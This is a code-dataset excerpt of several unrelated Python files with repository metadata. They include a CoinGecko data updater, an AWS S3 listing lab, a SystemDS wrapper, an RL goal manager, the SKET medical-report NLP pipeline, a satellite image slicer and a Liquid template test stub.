#u.plot_resonators(vna_filename, reso_freq = None, backend = 'plotly')
#gather tones and acquire noise
rf_freq, tones = u.get_tones(vna_filename)
tones = np.asarray(tones)
tones = np.concatenate((tones,guard_tones))
noise_filename = u.Get_noise(
tones,
measure_t = args.time,
rate = seed_rate,
decimation = args.decimation,
amplitudes = None,
RF = seed_rf,
output_filename = None,
Front_end = args.frontend,
Device = None,
delay = None,
pf_average = 4,
tx_gain = gains[i],
mode = args.mode,
trigger = trigger
)
#copy the resonator group
u.copy_resonator_group(vna_filename, noise_filename)
u.diagnostic_VNA_noise(noise_filename, noise_points = None, VNA_file = None, ant = ant, backend = 'matplotlib')
| 2.640625 | 3 |
update_data.py | PatShot/simpleCryptoViz | 0 | 12770802 | <filename>update_data.py
#!/usr/bin/env python3
import requests
import os
import pandas as pd
from datetime import datetime, timedelta
#Constants
API_BASE = 'https://api.coingecko.com/api/v3/'
ASSET_PLAT = '/asset_platforms'
COIN_LIST = '/coins/list'
def make_data_dir():
new_dir = os.path.join(os.getcwd(), 'data')
try:
os.mkdir(new_dir)
dir_flag = True
except FileExistsError:
dir_flag = False
return dir_flag
def update_data_folder():
try:
res_coin = requests.get(API_BASE+COIN_LIST)
res_plat = requests.get(API_BASE+ASSET_PLAT)
except:
raise NameError("Something Unexpected in connection")
data_1 = res_coin.json()
data_2 = res_plat.json()
coin_df= pd.DataFrame(data_1)
plat_df= pd.DataFrame(data_2)
coin_df.to_csv(os.path.join('data', 'coin_list.csv'))
plat_df.to_csv(os.path.join('data', 'asset_platforms.csv'))
with open(os.path.join('data', 'metadata_f.txt'), 'a') as metafile:
date = datetime.now().strftime("%Y_%m_%d, %H:%M:%S")
metafile.write(date)
def check_metafile():
"""Returns the last date of updation of metafile"""
try:
with open(os.path.join('data', 'metadata_f.txt'), 'r') as file:
data = file.readlines()
print(data[-1])
return data[-1]
except FileNotFoundError:
raise "metadata_f.txt is not present in the Data folder."
def auto_update_data(Interval=3):
"""
Auto Updates Data at a Given Interval of Days.
:param Interval: interval of updates in days.
:return : Last line of the Metadata file.
"""
latest_meta_line = check_metafile()
if datetime.today() > latest_meta_line + timedelta(Interval):
update_data_folder()
else:
return 0
if __name__ == "__main__":
if make_data_dir():
update_data_folder()
else:
auto_update_data(Interval=0) | 2.84375 | 3 |
labs/lab2-b.py | sw33tr0ll/aws-training | 2 | 12770803 | <gh_stars>1-10
#!/usr/bin/env python3
import boto3
s3_client = boto3.client('s3')
# retrieve list of buckets
raw_response = s3_client.list_buckets()
# for each bucket in your list....
for bucket in raw_response['Buckets']:
bucketName = bucket['Name']
# grab (raw) information about the objects in that bucket
raw_response = s3_client.list_objects_v2(Bucket=bucketName)
# if the bucket has any objects, print the name of each object
if raw_response['KeyCount']>0:
print("Files for bucket: {}".format(bucketName))
# for each object in the bucket
for bucket_object in raw_response['Contents']:
# print the name of the object
print(bucket_object['Key'])
else:
print("No files found in bucket: {}".format(bucketName))
| 3.359375 | 3 |
src/main/python/systemds/operator/algorithm/builtin/shortestPath.py | mdbloice/systemds | 372 | 12770804 | <reponame>mdbloice/systemds
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/shortestPath.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def shortestPath(G: Matrix,
sourceNode: int,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
"""
:param The: G can be 0/1 (just specifying whether the nodes
:param are: not) or integer values (representing the weight
:param of: or the distances between nodes, 0 if not connected).
:param maxi: Integer max number of iterations accepted (0 for FALSE, i.e.
:param max: iterations not defined)
:param sourceNode: index to calculate the shortest paths to all other nodes.
:param verbose: flag for verbose debug output
:return: 'OperationNode' containing minimum distance shortest-path from vertex i to vertex j. & of the minimum distance is infinity, the two nodes are
"""
params_dict = {'G': G, 'sourceNode': sourceNode}
params_dict.update(kwargs)
return Matrix(G.sds_context,
'shortestPath',
named_input_nodes=params_dict)
| 1.804688 | 2 |
gnet/gnet_manager_four_rooms_subgoals_3d.py | jleung1/goal_modelling_rl | 0 | 12770805 | <filename>gnet/gnet_manager_four_rooms_subgoals_3d.py
from gnet.gnet_manager import GNetManager
import numpy as np
DEBUG = False
class FourRoomSubgoals3DGNetManager(GNetManager):
def __init__(self, env, gnet_goals, qrm=False):
super().__init__(env, gnet_goals, last_num_goals=50, max_exploration_rate=0.8)
# Goal space is [yellow subgoal visited, blue subgoal visited, goal reached]
self.target_goal_state = [0, 0, 0, 0, 0]
self.gnet_goals = gnet_goals
self.qrm = qrm
self.reached_yellow_subgoal = False
self.reached_blue_subgoal = False
self.goal_space_size = 5
self.action_space_size = 3
def get_goal_state(self, selected_goal):
self.target_goal_state = self.current_goal_state()
if selected_goal == "reached yellow subgoal" or (
self.qrm
and selected_goal == "reached all subgoals"
and not self.reached_yellow_subgoal
):
x = self.env.yellow_subgoal.pos[0]
y = self.env.yellow_subgoal.pos[2]
self.target_goal_state[2] = True
elif selected_goal == "reached blue subgoal" or (
self.qrm
and selected_goal == "reached all subgoals"
and not self.reached_blue_subgoal
):
x = self.env.blue_subgoal.pos[0]
y = self.env.blue_subgoal.pos[2]
self.target_goal_state[3] = True
elif selected_goal == "end":
x = self.env.goal.pos[0]
y = self.env.goal.pos[2]
self.target_goal_state[4] = True
self.target_goal_state[0] = x
self.target_goal_state[1] = y
return self.target_goal_state
def check_goal_satisfied(self, selected_goal):
if (
selected_goal == "reached yellow subgoal"
and not self.reached_yellow_subgoal
or (
self.qrm
and selected_goal == "reached all subgoals"
and not self.reached_yellow_subgoal
)
):
self.reached_yellow_subgoal = self.env.reached_yellow_subgoal
if self.reached_yellow_subgoal:
if DEBUG:
print("reached yellow subgoal!")
return True
elif (
selected_goal == "reached blue subgoal"
and not self.reached_blue_subgoal
or (
self.qrm
and selected_goal == "reached all subgoals"
and not self.reached_blue_subgoal
)
):
self.reached_blue_subgoal = self.env.reached_blue_subgoal
if self.reached_blue_subgoal:
if DEBUG:
print("reached blue subgoal!")
return True
elif selected_goal == "end":
satisfied = self.env.near(self.env.goal)
if satisfied:
if DEBUG:
print("goal reached!")
return True
return False
def check_goal_relabel(self, start_goal, selected_goal):
satisfied = False
if selected_goal == "reached yellow subgoal" or (
self.qrm
and start_goal == "reached blue subgoal"
and selected_goal == "reached all subgoals"
):
satisfied = self.env.near(self.env.yellow_subgoal)
elif selected_goal == "reached blue subgoal" or (
self.qrm
and start_goal == "reached yellow subgoal"
and selected_goal == "reached all subgoals"
):
satisfied = self.env.near(self.env.blue_subgoal)
elif selected_goal == "end":
satisfied = self.env.near(self.env.goal)
return satisfied
def current_goal_state(self):
x = self.env.agent.pos[0]
y = self.env.agent.pos[2]
return [
x,
y,
self.reached_yellow_subgoal,
self.reached_blue_subgoal,
self.env.near(self.env.goal),
]
def reset(self):
super().reset()
self.reached_yellow_subgoal = False
self.reached_blue_subgoal = False
self.target_goal_state = [0, 0, False, False, False]
| 2.375 | 2 |
MedTAG_Dockerized/MedTAG_sket_dock_App/sket/sket/sket.py | MedTAG/medtag-core | 6 | 12770806 | <filename>MedTAG_Dockerized/MedTAG_sket_dock_App/sket/sket/sket.py
import os
import uuid
import json
from .rep_proc.report_processing import ReportProc
from .ont_proc.ontology_processing import OntoProc
from .nerd.nerd import NERD
from .rdf_proc.rdf_processing import RDFProc
from .utils import utils
class SKET(object):
def __init__(
self,
use_case, src_lang,
biospacy="en_core_sci_sm", biow2v=True, biofast=None, biobert=None, str_match=False, gpu=None, rules=None, dysplasia_mappings=None, cin_mappings=None,
ontology_path=None, hierarchies_path=None,
fields_path=None
):
"""
Load SKET components
Params:
SKET:
use_case (str): considered use case
src_lang (str): considered language
NERD:
biospacy (str): full spaCy pipeline for biomedical data
biow2v (bool): whether to use biospacy to perform semantic matching or not
biofast (str): biomedical fasttext model
biobert (str): biomedical bert model
str_match (bool): string matching
gpu (int): use gpu when using BERT
rules (str): hand-crafted rules file path
dysplasia_mappings (str): dysplasia mappings file path
cin_mappings (str): cin mappings file path
OntoProc:
ontology_path (str): ontology.owl file path
hierarchies_path (str): hierarchy relations file path
ReportProc:
fields_path (str): report fields file path
Returns: None
"""
# load Named Entity Recognition and Disambiguation (NERD)
self.nerd = NERD(biospacy, biow2v, str_match, biofast, biobert, rules, dysplasia_mappings, cin_mappings, gpu)
# load Ontology Processing (OntoProc)
self.onto_proc = OntoProc(ontology_path, hierarchies_path)
# load Report Processing (ReportProc)
self.rep_proc = ReportProc(src_lang, use_case, fields_path)
# load RDF Processing (RDFProc)
self.rdf_proc = RDFProc()
# define set of ad hoc labeling operations @smarchesin TODO: add 'custom' to lung too if required
self.ad_hoc_exa_labeling = {
'aoec': {
'colon': {
'original': utils.aoec_colon_concepts2labels,
'custom': utils.aoec_colon_labels2binary},
'cervix': {
'original': utils.aoec_cervix_concepts2labels,
'custom': utils.aoec_cervix_labels2aggregates},
'lung': {
'original': utils.aoec_lung_concepts2labels}
},
'radboud': {
'colon': {
'original': utils.radboud_colon_concepts2labels,
'custom': utils.radboud_colon_labels2binary},
'cervix': {
'original': utils.radboud_cervix_concepts2labels,
'custom': utils.radboud_cervix_labels2aggregates}
}
}
self.ad_hoc_med_labeling = {
'colon': {
'original': utils.colon_concepts2labels,
'custom': utils.colon_labels2binary
},
'cervix': {
'original': utils.cervix_concepts2labels,
'custom': utils.cervix_labels2aggregates
},
'lung': {
'original': utils.lung_concepts2labels
}
}
# set use case
self.use_case = use_case
# restrict hand-crafted rules and mappings based on use case
self.nerd.restrict2use_case(use_case)
# restrict onto concepts to the given use case
self.onto = self.onto_proc.restrict2use_case(use_case)
# restrict concept preferred terms (i.e., labels) given the use case
self.onto_terms = self.nerd.process_ontology_concepts([term.lower() for term in self.onto['label'].tolist()])
def update_nerd(
self,
biospacy="en_core_sci_lg", biofast=None, biobert=None, str_match=False, rules=None, dysplasia_mappings=None, cin_mappings=None, gpu=None):
"""
Update NERD model w/ input parameters
Params:
biospacy (str): full spaCy pipeline for biomedical data
biofast (str): biomedical fasttext model
biobert (str): biomedical bert model
str_match (bool): string matching
rules (str): hand-crafted rules file path
dysplasia_mappings (str): dysplasia mappings file path
cin_mappings (str): cin mappings file path
gpu (int): use gpu when using BERT
Returns: None
"""
# update nerd model
self.nerd = NERD(biospacy, biofast, biobert, str_match, rules, dysplasia_mappings, cin_mappings, gpu)
# restrict hand-crafted rules and mappings based on current use case
self.nerd.restrict2use_case(self.use_case)
def update_usecase(self, use_case):
"""
Update use case and dependent functions
Params:
use_case (str): considered use case
Returns: None
"""
if use_case not in ['colon', 'cervix', 'lung']: # raise exception
print('current supported use cases are: "colon", "cervix", and "lung"')
raise Exception
# set use case
self.use_case = use_case
# update report processing
self.rep_proc.update_usecase(self.use_case)
# restrict hand-crafted rules and mappings based on use case
self.nerd.restrict2use_case(use_case)
# restrict onto concepts to the given use case
self.onto = self.onto_proc.restrict2use_case(use_case)
# restrict concept preferred terms (i.e., labels) given the use case
self.onto_terms = self.nerd.process_ontology_concepts([term.lower() for term in self.onto['label'].tolist()])
def update_nmt(self, src_lang):
"""
Update NMT model changing source language
Params:
src_lang (str): considered source language
Returns: None
"""
# update NMT model
self.rep_proc.update_nmt(src_lang)
def update_report_fields(self, fields):
"""
Update report fields changing current ones
Params:
fields (list): report fields
Returns: None
"""
# update report fields
self.rep_proc.fields = fields
@staticmethod
def store_reports(reports, r_path):
"""
Store reports
Params:
reports (dict): reports
r_path (str): reports file path
Returns: None
"""
with open(r_path, 'w') as out:
json.dump(reports, out, indent=4)
@staticmethod
def load_reports(r_fpath):
"""
Load reports
Params:
r_fpath (str): reports file path
Returns: reports
"""
with open(r_fpath, 'r') as rfp:
reports = json.load(rfp)
return reports
@staticmethod
def store_concepts(concepts, c_fpath):
"""
Store extracted concepts as JSON dict
Params:
concepts (dict): dict containing concepts extracted from reports
c_fpath (str): concepts file path
Returns: None
"""
utils.store_concepts(concepts, c_fpath)
@staticmethod
def store_labels(labels, l_fpath):
"""
Store mapped labels as JSON dict
Params:
labels (dict): dict containing labels mapped from extracted concepts
l_fpath (str): labels file path
Returns: None
"""
utils.store_labels(labels, l_fpath)
def store_rdf_graphs(self, graphs, g_fpath):
"""
Store RDF graphs w/ RDF serialization format
Params:
graphs (list): list containing (s,p,o) triples representing ExaMode report(s)
g_fpath (str): graphs file path
Returns: None
"""
rdf_format = g_fpath.split('.')[-1]
if rdf_format not in ['ttl', 'n3', 'trig']: # raise exception
print('provide correct format: "ttl", "n3", or "trig".')
raise Exception
rdf_format = 'turtle' if rdf_format == 'ttl' else rdf_format
self.rdf_proc.serialize_report_graphs(graphs, output=g_fpath, rdf_format=rdf_format)
@staticmethod
def store_json_graphs(graphs, g_fpath):
"""
Store RDF graphs w/ JSON serialization format
Params:
graphs (dict): dict containing (s,p,o) triples representing ExaMode report(s)
g_fpath (str): graphs file path
Returns: None
"""
os.makedirs(os.path.dirname(g_fpath), exist_ok=True)
with open(g_fpath, 'w') as out:
json.dump(graphs, out, indent=4)
# EXAMODE RELATED FUNCTIONS
def prepare_exa_dataset(self, ds_fpath, sheet, header, hospital, ver, ds_name=None, debug=False):
"""
Prepare ExaMode batch data to perform NERD
Params:
ds_fpath (str): examode dataset file path
sheet (str): name of the excel sheet to use
header (int): row index used as header
hospital (str): considered hospital
ver (int): data format version
ds_name (str): dataset name
debug (bool): whether to keep flags for debugging
Returns: translated, split, and prepared dataset
"""
# get dataset name from file path if not provided
if not ds_name:
ds_name = ds_fpath.split('/')[-1].split('.')[0] # ./dataset/raw/aoec/####.csv
# set output directories
proc_out = './dataset/processed/' + hospital + '/' + self.use_case + '/'
trans_out = './dataset/translated/' + hospital + '/' + self.use_case + '/'
if os.path.isfile(trans_out + ds_name + '.json'): # translated reports file already exists
print('translated reports file already exist -- remove it before running "exa_pipeline" to reprocess it')
trans_reports = self.load_reports(trans_out + ds_name + '.json')
return trans_reports
elif os.path.isfile(proc_out + ds_name + '.json'): # processed reports file already exists
print('processed reports file already exist -- remove it before running "exa_pipeline" to reprocess it')
proc_reports = self.load_reports(proc_out + ds_name + '.json')
if hospital == 'aoec':
# translate reports
trans_reports = self.rep_proc.aoec_translate_reports(proc_reports)
elif hospital == 'radboud':
# translate reports
trans_reports = self.rep_proc.radboud_translate_reports(proc_reports)
else: # raise exception
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
if not os.path.exists(trans_out): # dir not exists -- make it
os.makedirs(trans_out)
# store translated reports
self.store_reports(trans_reports, trans_out + ds_name + '.json')
return trans_reports
else: # neither processed nor translated reports files exist
# load dataset
dataset = self.rep_proc.load_dataset(ds_fpath, sheet, header)
if hospital == 'aoec':
if ver == 1: # process data using method v1
proc_reports = self.rep_proc.aoec_process_data(dataset)
else: # process data using method v2
proc_reports = self.rep_proc.aoec_process_data_v2(dataset, debug=debug)
# translate reports
trans_reports = self.rep_proc.aoec_translate_reports(proc_reports)
elif hospital == 'radboud':
if ver == 1: # process data using method v1
proc_reports = self.rep_proc.radboud_process_data(dataset, debug=debug)
else: # process data using method v2
proc_reports = self.rep_proc.radboud_process_data_v2(dataset)
# translate reports
trans_reports = self.rep_proc.radboud_translate_reports(proc_reports)
else: # raise exception
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
if not os.path.exists(proc_out): # dir not exists -- make it
os.makedirs(proc_out)
# store processed reports
self.store_reports(proc_reports, proc_out + ds_name + '.json')
if not os.path.exists(trans_out): # dir not exists -- make it
os.makedirs(trans_out)
# store translated reports
self.store_reports(trans_reports, trans_out + ds_name + '.json')
return trans_reports
def exa_entity_linking(self, reports, hospital, sim_thr=0.7, raw=False, debug=False):
"""
Perform entity linking based on ExaMode reports structure and data
Params:
reports (dict): dict containing reports -- can be either one or many
hospital (str): considered hospital
sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
raw (bool): whether to return concepts within semantic areas or mentions+concepts
debug (bool): whether to keep flags for debugging
Returns: a dict containing concepts from input reports
"""
# perform entity linking
if hospital == 'aoec': # AOEC data
concepts = self.nerd.aoec_entity_linking(reports, self.onto_proc, self.onto, self.onto_terms, self.use_case, sim_thr, raw, debug=debug)
elif hospital == 'radboud': # Radboud data
concepts = self.nerd.radboud_entity_linking(reports, self.onto, self.onto_terms, self.use_case, sim_thr, raw, debug=debug)
else: # raise exception
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
return concepts
def exa_labeling(self, concepts, hospital):
"""
Map extracted concepts to pre-defined labels
Params:
concepts (dict): dict containing concepts extracted from report(s)
hospital (str): considered hospital
Returns: a dict containing labels from input report(s)
"""
if hospital not in ['aoec', 'radboud']:
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
labels = self.ad_hoc_exa_labeling[hospital][self.use_case]['original'](concepts)
return labels
def create_exa_graphs(self, reports, concepts, hospital, struct=False, debug=False):
"""
Create report graphs in RDF format
Params:
reports (dict): dict containing reports -- can be either one or many
concepts (dict): dict containing concepts extracted from report(s)
hospital (str): considered hospital
struct (bool): whether to return graphs structured as dict
debug (bool): whether to keep flags for debugging
Returns: list of (s,p,o) triples representing report graphs and dict structuring report graphs (if struct==True)
"""
if hospital == 'aoec': # AOEC data
create_graph = self.rdf_proc.aoec_create_graph
elif hospital == 'radboud': # Radboud data
create_graph = self.rdf_proc.radboud_create_graph
else: # raise exception
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
rdf_graphs = []
struct_graphs = []
# convert report data into (s,p,o) triples
for rid in reports.keys():
rdf_graph, struct_graph = create_graph(rid, reports[rid], concepts[rid], self.onto_proc, self.use_case, debug=debug)
rdf_graphs.append(rdf_graph)
struct_graphs.append(struct_graph)
if struct: # return both rdf and dict graphs
return rdf_graphs, struct_graphs
else:
return rdf_graphs
def exa_pipeline(self, ds_fpath, sheet, header, ver, use_case=None, hosp=None, sim_thr=0.7, raw=False, debug=False):
"""
Perform the complete SKET pipeline over ExaMode data:
- (i) Load dataset
- (ii) Process dataset
- (iii) Translate dataset
- (iv) Perform entity linking and store concepts
- (v) Perform labeling and store labels
- (vi) Create RDF graphs and store graphs
Params:
ds_fpath (str): dataset file path
sheet (str): name of the excel sheet to use
header (int): row index used as header
ver (int): data format version
use_case (str): considered use case
hosp (str): considered hospital
sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
raw (bool): whether to return concepts within semantic areas or mentions+concepts
debug (bool): whether to keep flags for debugging.
Returns: None
"""
if use_case: # update to input use case
self.update_usecase(use_case)
# get dataset name
ds_name = ds_fpath.split('/')[-1].split('.')[0] # ./dataset/raw/aoec/####.csv
if hosp: # update to input hospital
if hosp not in ['aoec', 'radboud']:
print('provide correct hospital info: "aoec" or "radboud"')
raise Exception
else:
hospital = hosp
else:
# get hospital name
hospital = ds_fpath.split('/')[-2] # ./dataset/raw/ --> aoec <-- /####.csv
# set output directories
if raw: # return mentions+concepts (used for EXATAG)
concepts_out = './outputs/concepts/raw/' + hospital + '/' + self.use_case + '/'
else: # perform complete pipeline (used for SKET/CERT/EXANET)
concepts_out = './outputs/concepts/refined/' + hospital + '/' + self.use_case + '/'
labels_out = './outputs/labels/' + hospital + '/' + self.use_case + '/'
rdf_graphs_out = './outputs/graphs/rdf/' + hospital + '/' + self.use_case + '/'
struct_graphs_out = './outputs/graphs/json/' + hospital + '/' + self.use_case + '/'
# prepare dataset
reports = self.prepare_exa_dataset(ds_fpath, sheet, header, hospital, ver, ds_name, debug=debug)
# perform entity linking
concepts = self.exa_entity_linking(reports, hospital, sim_thr, raw, debug=debug)
# store concepts
self.store_concepts(concepts, concepts_out + 'concepts_' + ds_name + '.json')
if raw: # return mentions+concepts
return concepts
# perform labeling
labels = self.exa_labeling(concepts, hospital)
# store labels
self.store_labels(labels, labels_out + 'labels_' + ds_name + '.json')
# create RDF graphs
rdf_graphs, struct_graphs = self.create_exa_graphs(reports, concepts, hospital, struct=True, debug=debug)
# store RDF graphs
self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.n3')
self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.trig')
self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.ttl')
# store JSON graphs
self.store_json_graphs(struct_graphs, struct_graphs_out + 'graphs_' + ds_name + '.json')
# GENERAL-PURPOSE FUNCTIONS
def prepare_med_dataset(self, ds, ds_name, src_lang=None, store=False, debug=False):
"""
Prepare dataset to perform NERD
Params:
ds (dict): dataset
ds_name (str): dataset name
src_lang (str): considered language
store (bool): whether to store concepts, labels, and RDF graphs
debug (bool): whether to keep flags for debugging
Returns: translated, split, and prepared dataset
"""
# set output directories
workpath = os.path.dirname(os.path.abspath(__file__))
proc_path_par = os.path.join(workpath, os.pardir)
proc_out = os.path.join(proc_path_par, './dataset/processed/' + self.use_case + '/')
trans_out = os.path.join(proc_path_par, './dataset/translated/' + self.use_case + '/')
# process reports
proc_reports = self.rep_proc.process_data(ds, debug=debug)
if store: # store processed reports
os.makedirs(proc_out, exist_ok=True)
self.store_reports(proc_reports, proc_out + ds_name + '.json')
if src_lang != 'en': # translate reports
trans_reports = self.rep_proc.translate_reports(proc_reports)
else: # keep processed reports
trans_reports = proc_reports
if store: # store translated reports
os.makedirs(trans_out, exist_ok=True)
self.store_reports(trans_reports, trans_out + ds_name + '.json')
return trans_reports
def med_entity_linking(self, reports, sim_thr=0.7, raw=False, debug=False):
"""
Perform entity linking on input reports
Params:
reports (dict): dict containing reports -- can be either one or many
sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
raw (bool): whether to return concepts within semantic areas or mentions+concepts
debug (bool): whether to keep flags for debugging
Returns: a dict containing concepts from input reports
"""
# perform entity linking
concepts = self.nerd.entity_linking(reports, self.onto, self.onto_terms, self.use_case, sim_thr, raw, debug=debug)
return concepts
def med_labeling(self, concepts):
"""
Map extracted concepts to pre-defined labels
Params:
concepts (dict): dict containing concepts extracted from report(s)
Returns: a dict containing labels from input report(s)
"""
labels = self.ad_hoc_med_labeling[self.use_case]['original'](concepts)
return labels
def create_med_graphs(self, reports, concepts, struct=False, debug=False):
"""
Create report graphs in RDF format
Params:
reports (dict): dict containing reports -- can be either one or many
concepts (dict): dict containing concepts extracted from report(s)
struct (bool): whether to return graphs structured as dict
debug (bool): whether to keep flags for debugging
Returns: list of (s,p,o) triples representing report graphs and dict structuring report graphs (if struct==True)
"""
rdf_graphs = []
struct_graphs = []
# convert report data into (s,p,o) triples
for rid in reports.keys():
rdf_graph, struct_graph = self.rdf_proc.create_graph(rid, reports[rid], concepts[rid], self.onto_proc, self.use_case, debug=debug)
rdf_graphs.append(rdf_graph)
struct_graphs.append(struct_graph)
if struct: # return both rdf and dict graphs
return rdf_graphs, struct_graphs
else:
return rdf_graphs
def med_pipeline(self, ds, src_lang=None, use_case=None, sim_thr=0.7, store=False, raw=False, debug=False):
"""
Perform the complete SKET pipeline over generic data:
- (i) Process dataset
- (ii) Translate dataset
- (iii) Perform entity linking (and store concepts)
- (iv) Perform labeling (and store labels)
- (v) Create RDF graphs (and store graphs)
- (vi) Return concepts, labels, and RDF graphs
When raw == True: perform steps i-iii and return mentions+concepts
When store == True: store concepts, labels, and RDF graphs
Params:
ds (dict): dataset
src_lang (str): considered language
use_case (str): considered use case
hosp (str): considered hospital
sim_thr (float): keep candidates with sim score greater than or equal to sim_thr
store (bool): whether to store concepts, labels, and RDF graphs
raw (bool): whether to return concepts within semantic areas or mentions+concepts
debug (bool): whether to keep flags for debugging
Returns: None
"""
if use_case: # update to input use case
self.update_usecase(use_case)
if src_lang: # update to input source language
self.update_nmt(src_lang)
# set output directories
workpath = os.path.dirname(os.path.abspath(__file__))
out_path = os.path.join(workpath, os.pardir)
if raw: # return mentions+concepts (used for EXATAG)
concepts_out = os.path.join(out_path,'./outputs/concepts/raw/' + self.use_case + '/')
else: # perform complete pipeline (used for SKET/CERT/EXANET)
concepts_out = os.path.join(out_path, './outputs/concepts/refined/' + self.use_case + '/')
labels_out = os.path.join(out_path, './outputs/labels/' + self.use_case + '/')
rdf_graphs_out = os.path.join(out_path, './outputs/graphs/rdf/' + self.use_case + '/')
struct_graphs_out = os.path.join(out_path, './outputs/graphs/json/' + self.use_case + '/')
# set dataset name
ds_name = str(uuid.uuid4())
# prepare dataset
reports = self.prepare_med_dataset(ds, ds_name, src_lang, store, debug=debug)
# perform entity linking
concepts = self.med_entity_linking(reports, sim_thr, raw, debug=debug)
# print(labels)
if store: # store concepts
self.store_concepts(concepts, concepts_out + 'concepts_' + ds_name + '.json')
if raw: # return mentions+concepts
return concepts
# perform labeling
labels = self.med_labeling(concepts)
if store: # store labels
self.store_labels(labels, labels_out + 'labels_' + ds_name + '.json')
# create RDF graphs
rdf_graphs, struct_graphs = self.create_med_graphs(reports, concepts, struct=True, debug=debug)
if store: # store graphs
# RDF graphs
self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.n3')
self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.trig')
self.store_rdf_graphs(rdf_graphs, rdf_graphs_out + 'graphs_' + ds_name + '.ttl')
# JSON graphs
self.store_json_graphs(struct_graphs, struct_graphs_out + 'graphs_' + ds_name + '.json')
return concepts, labels, rdf_graphs
| 2 | 2 |
satellite/output/slicer.py | mtsmarcoto/deep-learning | 0 | 12770807 | <gh_stars>0
import logging
import os
import gdal
from satellite import settings
from os.path import basename
from PIL import Image
class Slicer:
"""
When infering, images with bigger dimensions than the ones used for training should be handled before predictions.
This class provide the utilities for that, with cropping/slicing procedures
"""
def slice_bitmap(self, file, width, height, output_folder):
"""
Open the non-geographic image file, and crop it equally with dimensions of width x height, placing
it in output_folder. The remaining borders is also cropped and saved in the folder
:param file: absolute image path [oversized image]
:param width: the desired tile width
:param height: the desired tile height
:param output_folder: the destination folder of the tiles/slices
:return paths: a list of absolute paths, regarding each tile cropped
"""
logging.info(">>>> Slicing image " + file + "...")
filename = basename(file)
name, file_extension = os.path.splitext(filename)
if not os.path.isfile(file):
logging.info(">>>>>> Image {} does not exist. Check it and try again!".format(filename))
return
image = Image.open(file)
cols, rows = image.size
cont = 0
paths = []
buffer = settings.BUFFER_TO_INFERENCE
for j in range(0, cols, (height - buffer)):
for i in range(0, rows, (width - buffer)):
output_file = os.path.join(output_folder, name + "_" + "{:05d}".format(cont) + file_extension)
if not ((i + width) > rows) and not ((j + height) > cols):
image.crop((i, j, i + width, j + height)).save(output_file)
paths.append(output_file)
cont += 1
return paths
def slice_geographic(self, file, width, height, output_folder):
"""
Open the image file, and crop it equally with dimensions of width x height, placing it in output_folder.
The remaining borders is also cropped and saved in the folder
:param file: absolute image path [oversized image]
:param width: the desired tile width
:param height: the desired tile height
:param output_folder: the destination folder of the tiles/slices
:return paths: a list of absolute paths, regarding each tile cropped
"""
logging.info(">>>> Slicing image " + file + "...")
filename = basename(file)
name, file_extension = os.path.splitext(filename)
if not os.path.isfile(file):
logging.info(">>>>>> Image {} does not exist. Check it and try again!".format(filename))
return
ds = gdal.Open(file)
if ds is None:
logging.info(">>>>>> Could not open image file. Check it and try again!")
return
cont = 0
rows = ds.RasterXSize
cols = ds.RasterYSize
datatype = ds.GetRasterBand(1).DataType
paths = []
gdal.UseExceptions()
buffer = settings.BUFFER_TO_INFERENCE
for j in range(0, cols, (height - buffer)):
for i in range(0, rows, (width - buffer)):
output_file = os.path.join(output_folder, name + "_" + "{:05d}".format(cont) + file_extension)
try:
if not ((i + width) > rows) and not ((j + height) > cols):
gdal.Translate(output_file, ds, format='GTIFF', srcWin=[i, j, width, height],
outputType=datatype, options=['-eco', '-epo',
'-b', settings.RASTER_TILES_COMPOSITION[0],
'-b', settings.RASTER_TILES_COMPOSITION[1],
'-b', settings.RASTER_TILES_COMPOSITION[2]])
paths.append(output_file)
cont += 1
except RuntimeError:
logging.warning(">>>>>> Something went wrong during image slicing...")
return paths
def merge_images(self, paths, max_width, max_height, complete_path_to_merged_prediction):
"""
Merge the result of each tile in a single image [reverse operation of slice method]
:param paths: list of absolute paths
:param max_width: the desired tile width
:param max_height: the desired tile height
:param complete_path_to_merged_prediction: absolute path to the merged final prediction
"""
new_im = Image.new('RGBA', (max_width, max_height), (0, 0, 0, 0))
x = 0
y = 0
buffer = settings.BUFFER_TO_INFERENCE
for file in paths:
img = Image.open(file).convert('RGBA')
width, height = img.size
img.thumbnail((width, height), Image.ANTIALIAS)
if not ((x + width) > max_width) and not ((y + height) > max_height):
new_im.paste(img, (x, y, x + width, y + height), mask=img)
else:
x = 0
y += (height - buffer)
new_im.paste(img, (x, y, x + width, y + height), mask=img)
x += (width - buffer)
new_im.convert("RGB").save(complete_path_to_merged_prediction, "PNG")
| 2.75 | 3 |
dsplot/tree/__init__.py | avere001/dsplot | 8 | 12770808 | from .binary_tree import BinaryTree
| 1.070313 | 1 |
liquid/golden/unless_tag.py | jg-rp/liquid | 19 | 12770809 | <filename>liquid/golden/unless_tag.py
"""Golden tests cases for testing liquid's `unless` tag."""
from liquid.golden.case import Case
cases = [
Case(
description="literal false condition",
